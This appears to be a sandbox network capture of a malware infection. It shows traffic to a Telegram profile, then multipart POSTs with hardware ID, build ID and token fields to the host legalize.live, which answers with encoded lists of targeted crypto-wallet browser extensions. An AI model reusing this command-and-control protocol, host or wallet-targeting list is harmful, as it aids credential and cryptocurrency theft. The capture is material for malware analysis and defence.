Jan 15, 2025 20:16:38.486022949 CET	59195	443	192.168.2.5	172.64.41.3
Jan 15, 2025 20:16:39.002460957 CET	52803	443	192.168.2.5	162.159.61.3
Jan 15, 2025 20:16:52.104439020 CET	55764	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:52.265305042 CET	53	55764	1.1.1.1	192.168.2.5
Jan 15, 2025 20:18:30.835005045 CET	64149	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:18:30.835133076 CET	53814	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:18:30.841854095 CET	53	53814	1.1.1.1	192.168.2.5
Jan 15, 2025 20:18:30.842052937 CET	53	64149	1.1.1.1	192.168.2.5
Jan 15, 2025 20:19:44.162754059 CET	138	138	192.168.2.5	192.168.2.255
Jan 15, 2025 20:20:34.783138990 CET	53692	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:20:34.783426046 CET	62183	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:20:34.789937973 CET	53	53692	1.1.1.1	192.168.2.5
Jan 15, 2025 20:20:34.790102005 CET	53	62183	1.1.1.1	192.168.2.5

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:16:03 UTC	85	OUT	GET /w0ctzn HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2025-01-15 19:16:04 UTC	510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 15 Jan 2025 19:16:04 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12307 Connection: close Set-Cookie: stel_ssid=42d4afa5893e2e2a02_904785558995731711; expires=Thu, 16 Jan 2025 19:16:04 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2025-01-15 19:16:04 UTC	12307	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 77 30 63 74 7a 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @w0ctzn</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:16:05 UTC	186	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: legalize.live Connection: Keep-Alive Cache-Control: no-cache
2025-01-15 19:16:05 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 19:16:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-15 19:16:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:16:06 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ycjwbimo8yukn79hlngl User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: legalize.live Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2025-01-15 19:16:06 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 79 63 6a 77 62 69 6d 6f 38 79 75 6b 6e 37 39 68 6c 6e 67 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 44 45 35 42 41 32 41 30 41 35 31 39 31 35 33 33 34 32 33 37 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 79 63 6a 77 62 69 6d 6f 38 79 75 6b 6e 37 39 68 6c 6e 67 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 66 65 63 63 31 61 37 34 66 30 38 35 61 35 38 66 31 64 65 62 65 34 62 39 32 62 32 63 35 39 0d 0a 2d 2d 2d 2d 2d 2d 79 63 6a 77 62 69 6d 6f 38 79 75 6b 6e 37 39 68 6c 6e 67 6c 2d 2d 0d Data Ascii: ------ycjwbimo8yukn79hlnglContent-Disposition: form-data; name="hwid"A5DE5BA2A0A51915334237-a33c7340-61ca------ycjwbimo8yukn79hlnglContent-Disposition: form-data; name="build_id"74fecc1a74f085a58f1debe4b92b2c59------ycjwbimo8yukn79hlngl--
2025-01-15 19:16:07 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 19:16:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-15 19:16:07 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 34 61 61 30 39 35 61 32 63 37 36 62 35 35 61 35 63 64 37 34 31 32 38 35 61 61 38 37 36 38 33 64 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|4aa095a2c76b55a5cd741285aa87683d\|1\|1\|1\|0\|0\|50000\|10

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:16:09 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----cbsjw4oz5fcjm7gvaaaa User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: legalize.live Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-01-15 19:16:09 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 63 62 73 6a 77 34 6f 7a 35 66 63 6a 6d 37 67 76 61 61 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 61 61 30 39 35 61 32 63 37 36 62 35 35 61 35 63 64 37 34 31 32 38 35 61 61 38 37 36 38 33 64 0d 0a 2d 2d 2d 2d 2d 2d 63 62 73 6a 77 34 6f 7a 35 66 63 6a 6d 37 67 76 61 61 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 66 65 63 63 31 61 37 34 66 30 38 35 61 35 38 66 31 64 65 62 65 34 62 39 32 62 32 63 35 39 0d 0a 2d 2d 2d 2d 2d 2d 63 62 73 6a 77 34 6f 7a 35 66 63 6a 6d 37 67 76 61 61 61 61 0d 0a 43 6f 6e 74 Data Ascii: ------cbsjw4oz5fcjm7gvaaaaContent-Disposition: form-data; name="token"4aa095a2c76b55a5cd741285aa87683d------cbsjw4oz5fcjm7gvaaaaContent-Disposition: form-data; name="build_id"74fecc1a74f085a58f1debe4b92b2c59------cbsjw4oz5fcjm7gvaaaaCont
2025-01-15 19:16:09 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 19:16:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-15 19:16:09 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:16:10 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----89hdt0hdbimozmyukny5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: legalize.live Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2025-01-15 19:16:10 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 38 39 68 64 74 30 68 64 62 69 6d 6f 7a 6d 79 75 6b 6e 79 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 61 61 30 39 35 61 32 63 37 36 62 35 35 61 35 63 64 37 34 31 32 38 35 61 61 38 37 36 38 33 64 0d 0a 2d 2d 2d 2d 2d 2d 38 39 68 64 74 30 68 64 62 69 6d 6f 7a 6d 79 75 6b 6e 79 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 66 65 63 63 31 61 37 34 66 30 38 35 61 35 38 66 31 64 65 62 65 34 62 39 32 62 32 63 35 39 0d 0a 2d 2d 2d 2d 2d 2d 38 39 68 64 74 30 68 64 62 69 6d 6f 7a 6d 79 75 6b 6e 79 35 0d 0a 43 6f 6e 74 Data Ascii: ------89hdt0hdbimozmyukny5Content-Disposition: form-data; name="token"4aa095a2c76b55a5cd741285aa87683d------89hdt0hdbimozmyukny5Content-Disposition: form-data; name="build_id"74fecc1a74f085a58f1debe4b92b2c59------89hdt0hdbimozmyukny5Cont
2025-01-15 19:16:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 19:16:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-15 19:16:11 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:16:12 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----bi5xt0hvas268qi5xl6p User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: legalize.live Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
2025-01-15 19:16:12 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 62 69 35 78 74 30 68 76 61 73 32 36 38 71 69 35 78 6c 36 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 61 61 30 39 35 61 32 63 37 36 62 35 35 61 35 63 64 37 34 31 32 38 35 61 61 38 37 36 38 33 64 0d 0a 2d 2d 2d 2d 2d 2d 62 69 35 78 74 30 68 76 61 73 32 36 38 71 69 35 78 6c 36 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 66 65 63 63 31 61 37 34 66 30 38 35 61 35 38 66 31 64 65 62 65 34 62 39 32 62 32 63 35 39 0d 0a 2d 2d 2d 2d 2d 2d 62 69 35 78 74 30 68 76 61 73 32 36 38 71 69 35 78 6c 36 70 0d 0a 43 6f 6e 74 Data Ascii: ------bi5xt0hvas268qi5xl6pContent-Disposition: form-data; name="token"4aa095a2c76b55a5cd741285aa87683d------bi5xt0hvas268qi5xl6pContent-Disposition: form-data; name="build_id"74fecc1a74f085a58f1debe4b92b2c59------bi5xt0hvas268qi5xl6pCont
2025-01-15 19:16:13 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 19:16:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-15 19:16:13 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:16:14 UTC	615	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:16:15 UTC	1266	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 19:16:15 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-r2iMyc84HwEiCtUaccdCCA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-01-15 19:16:15 UTC	124	IN	Data Raw: 33 33 32 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 70 6c 61 79 73 74 61 74 69 6f 6e 20 70 6c 75 73 20 67 61 6d 65 73 22 2c 22 68 61 67 72 69 64 20 63 61 73 74 69 6e 67 22 2c 22 70 68 6f 65 6e 69 78 20 73 75 6e 73 20 74 72 61 64 65 22 2c 22 75 73 63 69 73 20 76 69 73 61 20 62 75 6c 6c 65 74 69 6e 22 2c 22 73 70 61 63 65 78 20 73 74 61 72 73 68 69 70 20 66 6c 69 67 68 74 20 Data Ascii: 332)]}'["",["playstation plus games","hagrid casting","phoenix suns trade","uscis visa bulletin","spacex starship flight
2025-01-15 19:16:15 UTC	701	IN	Data Raw: 37 20 6c 61 75 6e 63 68 22 2c 22 6e 69 6e 74 65 6e 64 6f 20 73 77 69 74 63 68 20 63 6f 6e 73 6f 6c 65 22 2c 22 67 65 6f 72 67 69 61 20 73 63 68 6f 6f 6c 20 63 6c 6f 73 69 6e 67 73 22 2c 22 79 6f 75 6e 67 20 61 6e 64 20 74 68 65 20 72 65 73 74 6c 65 73 73 20 73 70 6f 69 6c 65 72 73 20 63 6c 61 69 72 65 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 Data Ascii: 7 launch","nintendo switch console","georgia school closings","young and the restless spoilers claire"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:sug
2025-01-15 19:16:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:16:15 UTC	518	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:16:15 UTC	1018	IN	HTTP/1.1 200 OK Version: 714120572 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Wed, 15 Jan 2025 19:16:15 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-01-15 19:16:15 UTC	372	IN	Data Raw: 33 34 61 34 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 34a4)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2025-01-15 19:16:15 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2025-01-15 19:16:15 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2025-01-15 19:16:15 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2025-01-15 19:16:15 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 